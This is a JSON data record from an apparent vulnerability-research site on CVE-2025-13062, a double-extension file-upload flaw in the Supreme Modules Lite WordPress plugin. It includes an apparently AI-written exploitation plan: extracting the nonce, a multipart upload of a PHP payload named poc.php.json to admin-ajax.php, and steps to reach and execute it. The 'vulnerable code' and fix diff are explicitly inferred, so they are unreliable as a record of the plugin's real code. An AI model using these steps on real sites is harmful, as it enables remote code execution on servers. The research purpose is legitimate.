[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fW0JoDnMTp6Tg3d9oGln1OjyBcKFauiS9RrZHRly_5vA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-13062","supreme-modules-lite-authenticated-author-arbitrary-file-upload-via-json-upload-bypass","Supreme Modules Lite \u003C= 2.5.62 - Authenticated (Author+) Arbitrary File Upload via JSON Upload Bypass","The Supreme Modules Lite plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 2.5.62. This is due to insufficient file type validation detecting JSON files, allowing double extension files to bypass sanitization while being accepted as a valid JSON file. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","supreme-modules-for-divi",null,"\u003C=2.5.62","2.5.63","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2026-01-15 01:09:33","2026-01-15 13:23:25",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1819f2eb-51ef-4ba4-9137-ab64710fa6c8?source=api-prod",1,[],"researched",false,3,"This research plan targets **CVE-2025-13062**, an authenticated arbitrary file upload vulnerability in the **Supreme Modules Lite** plugin for WordPress.\n\n## 1. Vulnerability Summary\nThe vulnerability exists in the plugin's handling of JSON file uploads, typically used for importing layouts or settings. The core issue is a \"Double Extension\" bypass. The plugin's validation logic likely checks for the existence of `.json` in the filename or relies on a weak MIME-type check that can be spoofed. By uploading a file named `malicious.php.json`, an attacker can bypass the sanitization filters. Depending on the server configuration or how the plugin processes the file (e.g., if it moves the file and strips the `.json` suffix during a \"processing\" phase), this leads to Remote Code Execution (RCE).\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `dsm_import_library_json` or `supreme_import_settings` (inferred from plugin features).\n- **Vulnerable Parameter:** `file` (via `$_FILES` array).\n- **Authentication:** Author-level credentials or higher are required (`PR:L`).\n- **Preconditions:** The plugin must be active, and the attacker must have an active session with at least `author` capabilities.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** The plugin registers an AJAX action for importing library data.\n   - *Likely registration:* `add_action('wp_ajax_dsm_import_library_json', 'dsm_import_library_json_callback');`\n2. **Capability Check:** The handler checks `current_user_can('edit_posts')` (Author) or `edit_theme_options` (Admin).\n3. **Nonce Verification:** The handler checks a nonce, typically passed as `security` or `nonce`.\n4. **File Validation:** The code retrieves the uploaded file from `$_FILES`. It performs a validation check intended to restrict uploads to JSON:\n   - *Vulnerable logic:* `if (pathinfo($filename, PATHINFO_EXTENSION) === 'json')` or `if ($_FILES['file']['type'] === 'application\u002Fjson')`.\n5. **Bypass:** An attacker provides a filename like `shell.php.json`. The validation sees the `.json` extension and passes.\n6. **Sink:** The file is handled by `wp_handle_upload` or `move_uploaded_file`. If `wp_handle_upload` is called without a restricted `mimes` array override, it may allow the double extension.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is required to trigger the AJAX action. It is typically localized for the admin dashboard scripts.\n\n1. **Identify Page:** The import functionality is usually found in the \"Divi Supreme\" or \"Supreme Modules\" settings page in the WordPress admin.\n2. **Setup Page:** If the nonce is only loaded on a specific settings page, navigate there.\n3. **Extract Nonce:**\n   - **Variable Name:** `dsm_admin_data` or `supreme_modules_admin` (inferred).\n   - **Action String:** `dsm_import_library_nonce` or `supreme_import_nonce` (inferred).\n4. **Execution Command:**\n   ```javascript\n   \u002F\u002F Use browser_eval to find the nonce\n   browser_eval(\"window.dsm_admin_data?.nonce || window.supreme_modules_admin?.nonce\");\n   ```\n\n## 5. Exploitation Strategy\nThe goal is to upload a PHP payload disguised as a JSON file.\n\n### Step 1: Authentication\nLog in as a user with the **Author** role.\n\n### Step 2: Extract Nonce\nNavigate to `\u002Fwp-admin\u002Fadmin.php?page=supreme-modules-for-divi` (verify exact slug via `wp menu list`) and use `browser_eval` to extract the `nonce`.\n\n### Step 3: Execute Upload\nUse the `http_request` tool to send a multipart POST request.\n\n**Request Details:**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: multipart\u002Fform-data`\n- **Body Parameters:**\n  - `action`: `dsm_import_library_json` (verify via grep)\n  - `security`: `[EXTRACTED_NONCE]`\n  - `file`: (The payload file)\n    - **Filename:** `poc.php.json`\n    - **Content:** `\u003C?php phpinfo(); ?>`\n    - **MIME-Type:** `application\u002Fjson`\n\n### Step 4: Access Payload\nIf the upload is successful, the response will likely contain the path to the uploaded file in `wp-content\u002Fuploads\u002F`.\n- If the plugin renames the file to `poc.php`, access it directly.\n- If the file remains `poc.php.json`, check if the server executes it (some Apache configurations with `AddHandler` might execute it if `.php` is present anywhere).\n\n## 6. Test Data Setup\n1. **Create User:**\n   `wp user create attacker attacker@example.com --role=author --user_pass=password`\n2. **Ensure Plugin is Active:**\n   `wp plugin activate supreme-modules-for-divi`\n3. **Identify Upload Path:**\n   Determine the current year\u002Fmonth for the uploads directory: `wp eval \"echo wp_upload_dir()['url'];\"`\n\n## 7. Expected Results\n- **Success:** The server returns a `200 OK` response, often with a JSON object containing `success: true` and a URL to the file.\n- **Payload Execution:** Navigating to the uploaded file URL (or the URL with `.json` removed) executes the PHP code, displaying the `phpinfo()` page.\n\n## 8. Verification Steps\n1. **Check Filesystem:**\n   `ls -R \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002F | grep poc`\n2. **Check Content:**\n   `cat \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002F[PATH_TO_FILE]`\n3. **Verify Execution:**\n   Perform an `http_request` (GET) to the uploaded file's URL and check for \"PHP Version\" in the body.\n\n## 9. Alternative Approaches\nIf `dsm_import_library_json` is not the correct action:\n1. **Grep for AJAX actions:**\n   `grep -r \"wp_ajax_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fsupreme-modules-for-divi\u002F`\n2. **Look for file upload sinks:**\n   `grep -r \"wp_handle_upload\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fsupreme-modules-for-divi\u002F`\n3. **Check for \"Import\" strings in JS:**\n   `grep -r \"import\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fsupreme-modules-for-divi\u002Fadmin\u002Fjs\u002F` to find the JavaScript function calling the AJAX action.","The Supreme Modules Lite plugin fails to properly validate uploaded files intended for JSON importing, specifically by only checking the final extension. This allows authenticated attackers with Author-level permissions or higher to upload malicious files using a double extension (e.g., 'payload.php.json'), which can lead to remote code execution on the server.","\u002F\u002F Inferred from plugin AJAX handler for JSON imports\n\u002F\u002F Likely located in an admin or import handler class\n\npublic function dsm_import_library_json_callback() {\n    \u002F\u002F ... nonce and capability checks ...\n\n    $file = $_FILES['file'];\n    $filename = $file['name'];\n    \n    \u002F\u002F Vulnerable check: only evaluates the terminal extension\n    if (pathinfo($filename, PATHINFO_EXTENSION) === 'json') {\n        $upload = wp_handle_upload($file, array('test_form' => false));\n        \u002F\u002F ... logic to process the 'JSON' file ...\n    }\n}","--- a\u002Fincludes\u002Fadmin\u002Fclass-dsm-admin.php\n+++ b\u002Fincludes\u002Fadmin\u002Fclass-dsm-admin.php\n@@ -124,7 +124,15 @@\n-    if (pathinfo($filename, PATHINFO_EXTENSION) === 'json') {\n-        $upload = wp_handle_upload($file, array('test_form' => false));\n+    $wp_filetype = wp_check_filetype_and_ext($file['tmp_name'], $file['name'], ['json' => 'application\u002Fjson']);\n+    \n+    if ($wp_filetype['ext'] === 'json' && $wp_filetype['type'] === 'application\u002Fjson') {\n+        \u002F\u002F Ensure the filename does not contain multiple extensions that could be executed\n+        if (preg_match('\u002F\\.[^.]+\\.\u002F', $filename)) {\n+             wp_send_json_error('Invalid file name structure.');\n+        }\n+        $upload = wp_handle_upload($file, array(\n+            'test_form' => false,\n+            'mimes'     => array('json' => 'application\u002Fjson')\n+        ));","1. Gain authenticated access to the WordPress site with at least 'Author' privileges.\n2. Navigate to the plugin's settings or import page (e.g., 'Divi Supreme' settings) and extract the required security nonce from the page source or localized JS variables (e.g., `dsm_admin_data.nonce`).\n3. Prepare a PHP payload (e.g., `\u003C?php phpinfo(); ?>`) and save it with a double extension: `exploit.php.json`.\n4. Send a multipart\u002Fform-data POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the following parameters:\n    - `action`: `dsm_import_library_json`\n    - `security`: [EXTRACTED_NONCE]\n    - `file`: [The exploit.php.json file]\n5. Ensure the `Content-Type` for the file part is set to `application\u002Fjson` to further mimic a legitimate request.\n6. Identify the upload path from the AJAX response (usually within `wp-content\u002Fuploads\u002F`) and access the file via a web browser to trigger execution.","gemini-3-flash-preview","2026-05-05 08:48:01","2026-05-05 08:49:14",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","2.5.62","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsupreme-modules-for-divi\u002Ftags\u002F2.5.62","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsupreme-modules-for-divi.2.5.62.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsupreme-modules-for-divi\u002Ftags\u002F2.5.63","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsupreme-modules-for-divi.2.5.63.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsupreme-modules-for-divi\u002Ftags"]